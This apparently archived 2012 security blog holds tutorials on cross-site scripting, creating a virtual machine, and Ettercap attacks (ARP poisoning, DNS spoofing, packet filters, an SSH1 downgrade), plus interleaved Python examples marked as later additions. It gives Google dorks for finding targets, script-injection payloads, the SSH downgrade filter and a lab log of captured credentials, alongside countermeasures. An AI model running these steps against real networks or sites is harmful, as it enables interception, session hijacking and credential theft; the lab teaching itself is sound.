
Thursday, 20 December 2012

CROSS SITE SCRIPTING


Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability



What is XSS?
Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users. In a typical XSS attack, the attacker injects malicious JavaScript into a legitimate website; when a user visits the infected page or a specially crafted link, the browser executes the malicious script with the privileges of that site. A successfully exploited XSS vulnerability lets an attacker carry out phishing attacks, steal accounts and even build self-propagating worms.

Example: Imagine an attacker has discovered an XSS vulnerability in Gmail and injected a malicious script. When a user visits the site, the script executes. The code can redirect users to a fake Gmail login page or capture their cookies; with the stolen cookies the attacker can log in to the account and change the password.
It will help you understand XSS if you have the following prerequisites:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of the HTTP client-server architecture (Reference).
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP).

XSS Attack:
Step 1: Finding Vulnerable Website
Attackers use Google dorks such as "?search=" or ".php?q=" to find candidate sites; more experienced attackers target specific sites instead of relying on Google. If you are testing your own site, you have to check every page that reflects or stores user input.

Step 2: Testing the Vulnerability:
First, we have to find an input field where we can inject our own script: a search box, a username or password field, or any other input.


Test 1 :
Once we have found the input field, type a plain string into it, for instance "BTS". The page will display the result.

Now right-click on the page and select View Source. Search for the string "BTS" that we entered in the input field, and note where in the HTML the input appears.

Test 2:
Now we check whether the server sanitizes our input. To do this, enter the <script> tag in the input field.
View the source of the page and find the location where the input was displayed in the previous test.

If the code has not been sanitized by the server, the source contains exactly what we entered: <script>. If the server does sanitize our input, it will look like &lt;script&gt; instead. An unmodified <script> indicates that the website is vulnerable to XSS and that we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is probably vulnerable to XSS. To be sure, inject a complete JavaScript payload, for instance <script>alert('BTS')</script>.

If the page displays a pop-up box containing 'BTS', the XSS has been confirmed. By replacing the alert with a malicious script, an attacker can steal cookies, deface the site and more.

Types of XSS Based on persisting capability:
Based on persistence, XSS attacks fall into two types: Persistent and Non-Persistent.

Persistent XSS:

A Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server (typically in a database) and is then served permanently as part of a normal page.

For Example:   
Many websites host a support forum where registered users post questions, which are stored in the database. Imagine an attacker posts a message containing malicious JavaScript instead. If the server fails to sanitize the input, the injected script is executed whenever a user reads the post. If the injected code steals cookies, it steals the cookie of every user who reads the post, and with that cookie the attacker can take control of the account.


Non-Persistent XSS:

Non-Persistent XSS, also referred to as Reflected XSS, is the most common type found today. The injected code is sent to the server in the HTTP request; the server embeds the input in the HTML it returns in the HTTP response, and when the browser renders that HTML it also executes the embedded script. This kind of vulnerability frequently occurs in search fields.

Example:
Consider a project hosting website. To find a project we type a related word into the search box, and the results page displays a message like "search results for yourword". If the server fails to sanitize the input properly, a script injected as the search term is executed.

In a reflected XSS attack, the attacker sends a specially crafted link to victims and tricks them into clicking it. When a user clicks the link, the browser sends the injected code to the server, the server reflects it back in the response, and the browser executes it.
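The reflected search page and the stored forum post described above, side by side with their fixed versions, as an added example that is not code from the original post. The page templates, the in-memory MESSAGES store and the probe list are constructed for illustration; the probe strings are the ones used in the tutorial ("BTS", "<script>", "<script>alert('BTS')</script>"), and probe_reflection() automates the Test 1 / Test 2 / Step 3 check from the source view.

```python
"""Reflected and stored XSS: the tutorial's probes run against a vulnerable
page and against its escaped fix.

Added example (not code from the original post). The page templates, the
in-memory MESSAGES store and the probe list are constructed for illustration.
"""
import html

# ---- Reflected XSS: a search page echoes the query into the HTML body ----

def render_search_unsafe(query):
    # Vulnerable: the raw query is concatenated straight into the response.
    return "<html><body><h1>search results for " + query + "</h1></body></html>"


def render_search_safe(query):
    # Fixed: HTML-escape the query before it lands in an HTML text context,
    # so "<script>" reaches the browser as "&lt;script&gt;".
    return "<html><body><h1>search results for " + html.escape(query) + "</h1></body></html>"


# ---- Stored XSS: a forum post is saved, then rendered to every reader ----

MESSAGES = []  # constructed stand-in for the forum database


def post_message(body):
    MESSAGES.append(body)


def render_forum_unsafe():
    return "".join("<div class=post>" + m + "</div>" for m in MESSAGES)


def render_forum_safe():
    return "".join("<div class=post>" + html.escape(m) + "</div>" for m in MESSAGES)


# ---- The tutorial's Test 1 / Test 2 / Step 3, automated ----

PROBES = ["BTS", "<script>", "<script>alert('BTS')</script>"]


def probe_reflection(render, probe):
    """How does a probe come back from the page?

    'inert'   - the probe has no HTML metacharacters, so Test 1 proves nothing
    'raw'     - the probe is reflected byte-for-byte: markup/script is live
    'escaped' - it came back HTML-encoded (e.g. &lt;script&gt;): sanitised
    'absent'  - the input is not reflected at all
    """
    page = render(probe)
    if html.escape(probe) == probe:
        return "inert"
    if probe in page:
        return "raw"
    if html.escape(probe) in page:
        return "escaped"
    return "absent"


def is_vulnerable(render):
    # Step 3: only a full, unmodified script payload confirms execution
    return probe_reflection(render, "<script>alert('BTS')</script>") == "raw"


if __name__ == "__main__":
    for probe in PROBES:
        print("%-32r unsafe=%-8s safe=%s" % (
            probe, probe_reflection(render_search_unsafe, probe),
            probe_reflection(render_search_safe, probe)))
    post_message("Hello, I have a question")
    post_message("<script>alert('BTS')</script>")
    print("stored page executes script (unsafe):",
          "<script>alert('BTS')</script>" in render_forum_unsafe())
    print("stored page executes script (safe):  ",
          "<script>alert('BTS')</script>" in render_forum_safe())
```

html.escape() is the right fix only because the input lands in HTML text; input placed inside an attribute, a JavaScript string or a URL needs the encoding of that context, and a Content-Security-Policy that forbids inline scripts limits the damage when an encoding step is missed.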

In addition to these two types there is a third, DOM Based XSS, which I will explain in a later post.

What can an attacker do with this Vulnerability?
  • Stealing identities and confidential data (credit card details).
  • Bypassing restrictions in websites.
  • Session hijacking (stealing the session cookie).
  • Malware attacks.
  • Website defacement.
  • Denial of Service attacks (DoS).

Disclaimer:
This article is intended for educational purpose only.

Wednesday, 12 December 2012

HOW TO CREATE A VIRTUAL MACHINE


Beginner: How To Create a Virtual Machine in Windows 7 Using Virtual PC

Microsoft Virtual PC is a free application that helps you create your own virtual machines inside your current operating system, so you can test software, or learn a new environment easily. Here’s how to get started.

Using Windows Virtual PC

First, you need to download Virtual PC from Microsoft’s web site. You’ll want to make sure to select the right Windows 7 edition from the drop-down menu and then select Windows Virtual PC.
It will ask you to install Virtual PC as a Windows software update.
You will need to restart after the installation is done.
After rebooting, you can find Windows Virtual PC in your start menu and select it to open the program.
Click on Create virtual machine in the new window that opened.
Now, you can write the name for your new Virtual Machine and the location to store the virtual machine file.
In the next window, you can select the amount of RAM to assign to your virtual machine.
In the next window, you will create a virtual hard disk where you will install your virtual operating system. You can select between a dynamically expanding virtual hard disk (it will grow according to your virtual machine space requirements), use an existing virtual hard disk or use advanced options.
In the advanced options window, you can select to create a dynamically expanding hard disk (the hard drive will grow as your virtual machine needs), a fixed sized hard drive (you assign the amount of storage for it) and a differencing hard drive (the changes will be stored in a different hard drive so the original hard drive can be intact)
We will use a dynamically virtual hard drive for this example.
You can now select the location for your virtual hard drive in your computer and the name for it.
As we selected the dynamically expanding virtual hard drive, we will specify the maximum storage space for it to grow in the next window.
And that’s pretty much it!
You have created a virtual machine and only need to install the operating system.
You can go to Virtual PC again, and will find your new Virtual Machine. Right click on it to select the settings or click on the Settings menu.
In the settings windows, you can specify where the installation disk for your new operating system is located to install it in your new virtual machine.
Go to DVD Drive and select "Access a physical drive" if you have loaded the installation CD/DVD into the computer's optical drive.
Or select Open an ISO image to select an image with the installation files to install an operating system on your new virtual machine.
Once you’ve started up the virtual machine, just follow through the normal installation prompts to create your virtual operating system.

Tuesday, 11 December 2012

MAN IN THE MIDDLE ATTACKS-USING ETTERCAP


After the ARP poisoning tutorial, the victim's ARP cache has been changed to force the connections from the Windows machine to go through the Ettercap machine to reach their destination.

The network scenario diagram is available in the Ettercap introduction page.

As the trap is set, we are now ready to perform "man in the middle" attacks, in other words to modify or filter the packets coming from or going to the victim.

To launch attacks, you can either use an Ettercap plugin or load a filter created by yourself.

1. PLUGINS
2. FILTERS

 PLUGINS

We will use the Ettercap plugin called dns_spoof to test a very famous attack, DNS spoofing, where the attacker answers DNS requests in place of the DNS server.
When you access your favourite web site with your browser, your machine (IP address 192.168.1.2 in our case study) first asks the DNS server for the IP address matching the URL, and then the browser displays the web page.
With DNS spoofing, when the DNS request is sent, the spoofer answers before the real DNS server and provides a different IP address.
The consequence is that you believe you have reached the desired web site, but because of the different IP address it is in fact the attacker's site.

The attack is very dangerous when the attacker spoofs important websites such as your bank's. His fake web server will have exactly the same interface as the real bank site, so the attacker just waits for you to enter your credentials on his site and captures them.

Let's proceed with the DNS spoofing attack.
The first thing to do is to set the configuration file called etter.dns in the /usr/share/ettercap/ directory.

#vim /usr/share/ettercap/etter.dns
In the file you can find an explanation about its configuration.
Here is the content of our etter.dns file.

linux1.org       A     198.182.196.56
*.linux.com      A     198.182.196.56
www.linux.org    PTR   198.182.196.56
It means that when you open www.linux1.org in your web browser, you will see the content of the www.linux.org website.
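The matching rules of the etter.dns table above, as an added example that is not Ettercap's own code: a Python re-implementation of the dns_spoof lookup covering only A and PTR entries (the real plugin understands further record types), with a constructed sample table of the same shape as ours. The host name www.linux1.org in the sample is an assumption matching the sentence above.

```python
"""Parser and resolver for the etter.dns table used by Ettercap's dns_spoof plugin.

Added example, not Ettercap's code: it re-implements the A/PTR matching rules in
Python so a table can be checked before use. SAMPLE_ETTER_DNS is constructed.
"""
import fnmatch
import ipaddress

# etter.dns syntax: "<name>  <A|PTR>  <ip>", '#' comments, '*' wildcards in names.
SAMPLE_ETTER_DNS = """
# redirect these names to 198.182.196.56
www.linux1.org   A    198.182.196.56
*.linux.com      A    198.182.196.56
www.linux.org    PTR  198.182.196.56
"""


def parse_etter_dns(text):
    """Return a list of (name_pattern, rtype, ip) tuples; malformed lines raise ValueError."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError("line %d: expected '<name> <type> <ip>', got %r" % (lineno, raw))
        name, rtype, ip = parts
        rtype = rtype.upper()
        if rtype not in ("A", "PTR"):
            raise ValueError("line %d: unsupported record type %r" % (lineno, rtype))
        ipaddress.IPv4Address(ip)             # raises on a bad address
        entries.append((name.lower(), rtype, ip))
    return entries


def spoof_answer(entries, qname, qtype="A"):
    """What the spoofer answers for a query, or None if it stays silent.

    A queries: the first A entry whose name pattern (shell-style wildcard) matches qname.
    PTR queries (<reversed-ip>.in-addr.arpa): the first PTR entry for that address.
    """
    qname = qname.lower().rstrip(".")
    if qtype == "A":
        for name, rtype, ip in entries:
            if rtype == "A" and fnmatch.fnmatchcase(qname, name):
                return ip
        return None
    if qtype == "PTR":
        suffix = ".in-addr.arpa"
        if not qname.endswith(suffix):
            return None
        ip = ".".join(reversed(qname[: -len(suffix)].split(".")))
        for name, rtype, entry_ip in entries:
            if rtype == "PTR" and entry_ip == ip:
                return name
        return None
    return None


if __name__ == "__main__":
    table = parse_etter_dns(SAMPLE_ETTER_DNS)
    for q, t in [("www.linux1.org", "A"), ("ftp.linux.com", "A"), ("linux1.org", "A"),
                 ("56.196.182.198.in-addr.arpa", "PTR")]:
        print("%-32s %-4s -> %s" % (q, t, spoof_answer(table, q, t)))
```

Note that a wildcard entry such as *.linux.com matches ftp.linux.com but not the bare linux.com, so a name you want redirected must be listed exactly or covered by a pattern.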

To start the DNS spoofing, activate the dns_spoof plugin in the Ettercap graphical interface. Remember that you need to follow the ARP poisoning tutorial before doing the steps below.

Plugins -> Manage the plugins

Click on the dns_spoof line to activate the plugin. This will tag the line with a star.


Then enter www.linux1.org in a web browser.
You can see that the content of the page opened is the one that matches the IP address you added in the etter.dns file and not the real IP address matching the www.linux1.org address.


To stop the DNS spoofing:

Start -> Stop sniffing
Although we stopped the attack, www.linux1.org in the browser still shows the content of www.linux.org. This is because of the DNS cache on the client machine 192.168.1.2: Windows keeps a cached answer until its TTL expires, here 300 seconds (5 minutes). So either wait 5 minutes or, better, flush the DNS cache with the following command:

Launch a command line interface window as follow:
Start -> Run -> cmd

C:\Documents and Settings\administrator>ipconfig /flushdns
On an Ubuntu machine use the following command: "/etc/init.d/dns-clean start"
To see your DNS cache:

C:\Documents and Settings\administrator>ipconfig /displaydns
If you want to change the default DNS cache time, you have to modify an entry in the Windows registry.
Be careful when playing with the registry, an incorrect configuration can damage your system and prevent it from rebooting.

Start -> Run -> regedit, then navigate to the key below:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\

Click on "NegativeCacheTime" in the right panel. Note that this value only controls how long Windows caches negative answers (names that failed to resolve); how long a positive answer such as our spoofed A record stays cached is bounded by the record's TTL and by the MaxCacheTtl value in the same key.


click on the "Decimal" button and finally enter your new value for the DNS cache time.




 FILTERS

Filters allow you to change the content of packets.
A filter is written as a source file that must be compiled with etterfilter before Ettercap can load it. You can find some predefined examples in the /usr/share/ettercap/ directory.
We will study two examples based on Ettercap filters.

1. FTP prompt change
2. SSH downgrade attack

 1. FTP Prompt change:

For our simple example we chose to change the banner of an FTP connection. Below is our filter source, a file called etter_filter in the /usr/share/ettercap directory (the replacement string is "TeddyBear FTPD", as the FTP banner captured after filtering shows further down).

# replace the FTP prompt
if (tcp.src == 21 && search(DATA.data, "ProFTPD")) {
   replace("ProFTPD", "TeddyBear FTPD");
}


Then you need to compile the file with etterfilter because Ettercap can only load compiled files.

#etterfilter etter_filter -o etter_filter_compil
This will create a compiled file called etter_filter_compil.

Load the filter in Ettercap:

Filters -> Load a filter...


Now it is time to test an FTP connection from our client machine 192.168.1.2, before and after loading the Ettercap filter.
"xyz" stands for the website name and "1.2.3.4" for its IP address.

(Of course, you must be set as "man in the middle". If it's not already the case, follow the arp poisoning tutorial.)

Before filtering:

C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 ProFTPD 1.3.0a Server (ProFTPD) [1.2.3.4]
User (xyz.com:(none)):

After filtering:

C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 TeddyBear FTPD 1.3.0a Server (TeddyBear FTPD) [1.2.3.4]
User (xyz.com:(none)):




 2. SSH Downgrade attack:

A particularly crafty attack, the "downgrade attack", can be used once in the man-in-the-middle position. The principle is to change data inside packets so that the two ends negotiate an older protocol version known to be vulnerable.

---------------- Principle ----------------

SSH is the most famous example of a downgrade attack: the attacker forces the client and the server to use the insecure SSH1 protocol.

When the client connects, the server announces the protocol versions it supports in its version string:
- SSH-2.x: the server supports only SSH2
- SSH-1.99: the server supports both SSH1 and SSH2
- SSH-1.51 (or any 1.5x): the server supports only SSH1

In our example the server is configured to support both SSH1 and SSH2, and the client is set to accept both with SSH2 preferred.

Because the server answers "1.99", the attacker in the middle changes that string to "1.51", telling the client that the server supports only SSH1 and thus forcing it to open an SSH1 session.
The client, which believes it is using the secure SSH2 protocol, logs in over SSH1, and the password is immediately captured by the attacker because of SSH1's weak authentication: sitting in the SSH1 key exchange, Ettercap can decrypt the session.


---------------- Case Study Installation ----------------

a. SSH Server: OpenSSH on Linux
b. SSH client: Putty on Windows.
c. Hacker machine: Ettercap.

a. Server installation:

#apt-get install openssh-server

By default, only SSH2 is enabled on the OpenSSH server. To activate SSH1, first open the /etc/ssh/sshd_config file and update the line beginning with "Protocol" (note that OpenSSH 7.4 removed server-side SSH1 support entirely, so reproducing this lab requires an older release such as the 4.6 shown below):

#vim /etc/ssh/sshd_config
Protocol 1,2
You then need to create a SSH1 key pair otherwise you will have the following error after the SSH server reboot:
Disabling protocol version 1. Could not load host key.

#ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key -N ""
Add the key path into the sshd_config file:

HostKey /etc/ssh/ssh_host_key
Finally, restart the server:

#/etc/init.d/ssh restart
   * Restarting OpenBSD Secure Shell server sshd

The SSH server is now configured to accept SSH1 and SSH2 and thus provides a "ssh-1.99" response. We can check it with the following command:

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-1.99-OpenSSH_4.6p1 Debian-5ubuntu0.1


b. Client installation:

Download the Putty client, a well-known open source SSH client for Windows.
Keep Putty's default SSH configuration: SSH1 and SSH2 are both accepted, with SSH2 preferred.


c. Ettercap installation:

Follow the Ettercap installation tutorial to install Ettercap and the ARP poisoning tutorial to set our machine as "Man in the Middle".

Our laboratory is now operational, we can launch the SSH downgrade attack:

---------------- Launch the SSH downgrade attack ----------------

Ettercap ships a predefined filter for the SSH downgrade attack: /usr/share/ettercap/etter.filter.ssh.
We can look at the content of the file, but nothing needs to be modified.

#cat /usr/share/ettercap/etter.filter.ssh
if (ip.proto == TCP) {
   if (tcp.src == 22) {
      if ( replace("SSH-1.99", "SSH-1.51") ) {
         msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
      } else {
         if ( search(DATA.data, "SSH-2.00") ) {
            msg("[SSH Filter] Server supports only SSH version 2\n");
         } else {
            if ( search(DATA.data, "SSH-1.51") ) {
               msg("[SSH Filter] Server already supports only version 1\n");
            }
         }
      }
   }
}
We just need to compile the file to create the filter.

#etterfilter etter.filter.ssh -o etter_filter_ssh_co
We are now ready to load the filter.

Filters -> Load a filter...

Select the compiled file.


The filter is now loaded. We are ready to open an SSH link from the client.


The client, the hacker and the server machines are now configured correctly.
We can test opening an SSH link from the Putty client.
Open Putty, on the left, click on "Session", then enter the SSH server IP address (192.168.1.68 in our example) and check the "SSH" radio button. Click on the "Open" button to connect to the SSH server.


It's time to see if everything is working fine and check on the hacker machine if we catch the SSH1 password.


The attack works fine!

As shown, Ettercap has downgraded the SSH version and captured the SSH1 credentials:

[SSH Filter] SSH downgraded from version 2 to 1
SSH : 192.168.1.68:22 -> USER:guillfab PASS:T0rduT1m
We can observe a Wireshark capture from the SSH server during the SSH link establishment. (Click to enlarge)


1. The server (192.168.1.68) sends a "1.99" answer to the client (192.168.1.132) meaning it supports SSH1 and SSH2.
2. The client establishes an SSH1 link because the "1.99" server answer was changed to "1.51" by the hacker.
3. Encrypted SSH1 packets

---------------- Countermeasures ----------------

How to avoid SSH downgrade attacks ?

SSH1 must never be enabled on an SSH server, and SSH2 must be forced on the client.
By default only SSHv2 is enabled on the OpenSSH server, while it is common to see both SSHv1 and SSHv2 enabled on clients such as Putty.

Let's see how we can secure the SSH client and server:

SSH server:
Open the /etc/ssh/sshd_config file and check that only the SSH2 protocol is enabled.

#vim /etc/ssh/sshd_config
Protocol 2
If you make a change, restart the server with "#/etc/init.d/ssh restart".
Then to be sure your server really supports only SSH2, do the following command:

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.6p1 Debian-5ubuntu0.1

The version announced after "SSH-" must be 2.0; a 1.99 answer means the server still accepts SSH1.
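The version exchange under the etter.filter.ssh filter shown earlier, together with the server-side telnet check and the client-side "2 only" policy described here, as an added example that is not Ettercap's, OpenSSH's or PuTTY's code. Only the first line of the SSH exchange (the version banner) is modelled; the banners are the ones from the tutorial output, and the policy names "2pref", "2only" and "1only" are this example's own labels for the Putty radio buttons.

```python
"""SSH banner exchange: the etter.filter.ssh downgrade and the checks that defeat it.

Added example, not Ettercap's, OpenSSH's or PuTTY's code. Banners are taken from
the tutorial output; policy names are this example's labels for PuTTY's settings.
"""
import re

BANNER_RE = re.compile(r"^SSH-(\d+)\.(\d+)-(\S+)")


def mitm_filter(server_banner):
    """Mirror of etter.filter.ssh applied to one server->client banner.
    Returns (banner as forwarded to the client, filter log message)."""
    if "SSH-1.99" in server_banner:
        # Same-length replacement: the TCP payload size does not change.
        return (server_banner.replace("SSH-1.99", "SSH-1.51"),
                "[SSH Filter] SSH downgraded from version 2 to 1")
    if "SSH-2.00" in server_banner:
        # OpenSSH announces "SSH-2.0-", so this branch of the shipped filter
        # never fires for it; the banner is passed through untouched anyway.
        return server_banner, "[SSH Filter] Server supports only SSH version 2"
    if "SSH-1.51" in server_banner:
        return server_banner, "[SSH Filter] Server already supports only version 1"
    return server_banner, ""


def parse_banner(banner):
    """-> (offers_v2, offers_v1). RFC 4253 section 5.1: '1.99' means both."""
    m = BANNER_RE.match(banner)
    if not m:
        raise ValueError("not an SSH banner: %r" % banner)
    major, minor = int(m.group(1)), int(m.group(2))
    offers_v2 = major == 2 or (major == 1 and minor == 99)
    offers_v1 = major == 1
    return offers_v2, offers_v1


def client_choice(banner, policy="2pref"):
    """Protocol version the client will speak, or None to abort.
    "2pref": PuTTY default (2 preferred, 1 accepted); "2only": the fix; "1only"."""
    offers_v2, offers_v1 = parse_banner(banner)
    if policy == "2only":
        return 2 if offers_v2 else None
    if policy == "1only":
        return 1 if offers_v1 else None
    if offers_v2:
        return 2
    return 1 if offers_v1 else None


def server_only_v2(banner):
    """The tutorial's telnet check: a hardened server must announce SSH-2.x only."""
    offers_v2, offers_v1 = parse_banner(banner)
    return offers_v2 and not offers_v1


def negotiate(server_banner, policy="2pref", mitm=False):
    """Server banner -> optional man in the middle -> client decision.
    Returns (chosen version or None, filter log message)."""
    seen, log = mitm_filter(server_banner) if mitm else (server_banner, "")
    return client_choice(seen, policy), log


if __name__ == "__main__":
    both = "SSH-1.99-OpenSSH_4.6p1 Debian-5ubuntu0.1"   # Protocol 1,2
    v2 = "SSH-2.0-OpenSSH_4.6p1 Debian-5ubuntu0.1"      # Protocol 2
    for banner in (both, v2):
        for policy in ("2pref", "2only"):
            print("%-42s %-5s mitm -> %s" % (banner, policy, negotiate(banner, policy, mitm=True)))
```

Either fix alone is enough against this filter: a server announcing SSH-2.0 gives replace() nothing to rewrite, and a "2 only" client refuses the rewritten 1.51 banner instead of silently falling back to SSH1.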

SSH client:
Force the SSH2 protocol on the client.
On Putty, in the left panel, click on "Connection" then "SSH". Finally, check the "2 only" radio button.





As a general security rule, try always not to use the default settings, but to force the security level as high as possible both on a server AND its clients. 

ARP POISONING USING ETTERCAP



In this first tutorial, we will place our Ettercap machine as "man in the middle" after an ARP spoofing attack.

The network scenario diagram is available in the Ettercap introduction page.

The first thing to do is to set an IP address on your Ettercap machine in the same IP subnet as the machine you want to poison. For our tutorial the 192.168.1.100 IP address is used.
See the networking tutorial for detailed explanations about how to set an IP address on your Linux box.

As a reminder, Ettercap needs root privileges to start; it then drops privileges and runs as the 'nobody' user.


 1. ARP SPOOFING

 Open Ettercap in graphical mode

#ettercap -G

 Select the sniff mode

Sniff -> Unified sniffing





 Scan for hosts inside your subnet

Hosts -> Scan for hosts
The network range scanned will be determined by the IP settings of the interface you have just chosen in the previous step.









 See the MAC & IP addresses of the hosts inside your subnet.



 Select the machines to poison

We chose to ARP poison only the Windows machine 192.168.1.2 and the router 192.168.1.1.
Highlight the line containing 192.168.1.1 and click on the "target 1" button.
Highlight the line containing 192.168.1.2 and click on the "target 2" button.
If you do not select any target, all the machines in the subnet will be ARP poisoned.


 Check your targets



 Start the ARP poisoning

Mitm -> Arp poisoning





 Start the sniffer

Finally, start the sniffer to collect statistics.

Start -> Start sniffing



 ARP TRAFFIC:

On the Windows machine, with the help of Wireshark, we can compare the ARP traffic before and after the poisoning:

As a reminder (see the network diagram):
192.168.1.1     (Router)    11:22:33:44:11:11
192.168.1.2     (Windows)   11:22:33:44:55:66
192.168.1.100   (Pirate)    11:22:33:44:99:99
 Before the poisoning
Before being able to communicate, the router and the Windows machine each send an ARP request to find the MAC address of the other.

No  Source              Destination         Prot  Info
1   11:22:33:44:55:66   11:22:33:44:11:11   ARP   who has 192.168.1.1? Tell 192.168.1.2
2   11:22:33:44:11:11   11:22:33:44:55:66   ARP   192.168.1.1 is at 11:22:33:44:11:11
3   11:22:33:44:11:11   11:22:33:44:55:66   ARP   who has 192.168.1.2? Tell 192.168.1.1
4   11:22:33:44:55:66   11:22:33:44:11:11   ARP   192.168.1.2 is at 11:22:33:44:55:66

 After the poisoning
The router's ARP request is answered by the Windows machine exactly as in the previous capture.
The difference is that there is no longer a request from Windows (192.168.1.2) for the MAC address of the router (192.168.1.1), because the poisoner continuously sends ARP replies telling the Windows machine that 192.168.1.1 is at its own MAC address (11:22:33:44:99:99) instead of the router's (11:22:33:44:11:11).

No  Source              Destination         Prot  Info
1   11:22:33:44:11:11   11:22:33:44:55:66   ARP   who has 192.168.1.2? Tell 192.168.1.1
2   11:22:33:44:55:66   11:22:33:44:11:11   ARP   192.168.1.2 is at 11:22:33:44:55:66
3   11:22:33:44:99:99   11:22:33:44:55:66   ARP   192.168.1.1 is at 11:22:33:44:99:99
4   11:22:33:44:99:99   11:22:33:44:55:66   ARP   192.168.1.1 is at 11:22:33:44:99:99


 ARP TABLES:

If we look at the router and Windows machine ARP table, we see that the Ettercap Linux machine poisoned their ARP table and replaced the router or Windows machine MAC addresses by its own MAC address.
This means that the packets between the Windows machine and the router will transit through the Ettercap machine.
Let's see if we successfully poisoned the router and windows machine ARP table:

--------------------Windows machine 192.168.1.2--------------------
Launch a command line interface window as follows:
Start -> Run -> cmd

Before the poisoning:

C:\Documents and Settings\administrator>arp -a
Interface: 192.168.1.2 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           11-22-33-44-11-11     dynamic
  192.168.1.100         11-22-33-44-99-99     dynamic

After the poisoning:

C:\Documents and Settings\administrator>arp -a
Interface: 192.168.1.2 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           11-22-33-44-99-99     dynamic
  192.168.1.100         11-22-33-44-99-99     dynamic

--------------------Linux machine 192.168.1.100--------------------
#arp -a
? (192.168.1.1) at 11:22:33:44:11:11 [ether] on eth0
? (192.168.1.2) at 11:22:33:44:55:66 [ether] on eth0
--------------------Cisco router 192.168.1.1--------------------
Before the poisoning:

>show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.1.2            194  1122.3344.5566  ARPA   FastEthernet0/0
Internet  192.168.1.100          128  1122.3344.9999  ARPA   FastEthernet0/0

After the poisoning:

>show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.1.2            194  1122.3344.9999  ARPA   FastEthernet0/0
Internet  192.168.1.100          128  1122.3344.9999  ARPA   FastEthernet0/0
If you have a Netscreen (Juniper) device, use the following command to display the ARP table:

>get arp
On a Vyatta router:

>show arp



 STOPPING THE ARP SPOOFING:


Ettercap is pretty considerate: when the attack is stopped it "re-ARPs" the victims, i.e. it sends ARP replies that restore the correct entries in their caches.

If a cache still contains poisoned IP to MAC address mappings, you can either wait a few minutes for the ARP entries to expire or, better, clear the ARP cache:

On a Microsoft machine:

C:\Documents and Settings\admin>arp -d *
On an Ubuntu or Debian Linux:

#arp -d ip_address
On a Cisco router:

#clear arp-cache


 CONCLUSION

After this tutorial, the ARP table of the router and the Windows machine are poisoned: The Linux machine is now "in the middle".